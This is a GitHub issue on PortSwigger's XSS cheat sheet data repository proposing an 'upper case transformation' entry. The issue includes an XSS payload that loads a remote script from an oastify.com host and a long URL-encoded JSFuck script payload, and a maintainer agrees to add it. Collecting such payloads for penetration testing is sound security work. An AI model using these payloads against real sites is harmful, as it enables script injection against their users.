### ISSUE TITLE
upper-case transformation by the server

### ISSUE THREAD

**Issue by Hipapheralkus** [PortSwigger/xss-cheatsheet-data#74]
I recently found a backend which reflects the entire input, but makes it upper case. Therefore, most of the payloads cannot be used, as `VAR`; `ALERT()`; `STRING.FROMCHARCODE` will not work. Obviously with `<SCRIPT>` it doesn't matter. 
I'd like to suggest adding this use-case, like "upper case transformation" with 2 possible solutions:

- loading external XSS `<SCRIPT SRC="HTTPS://{ID}.OASTIFY.COM/A.JS"></SCRIPT>`
- JSFuck payload (probably the best to reference https://jsfuck.com/ as I have just used payload from there), but I've used `<SCRIPT>[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]][([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]]((![]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[%2b!%2b[]%2b[!%2b[]%2b!%2b[]%2b!%2b[]]]%2b[%2b!%2b[]]%2b([%2b[]]%2b![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[!%2b[]%2b!%2b[]%2b[%2b[]]])()</SCRIPT>` (as the payload was in URL I have encoded `+` with `%2b`)
Not sure if it qualifies, but there is no relevant mention of `case transformation` in the current cheat sheet if I'm not mistaken, so it may help someone

**Comment by hackvertor** [comment]
Thanks for the submission and sorry for the delay but this will be added in the next update. Cheers
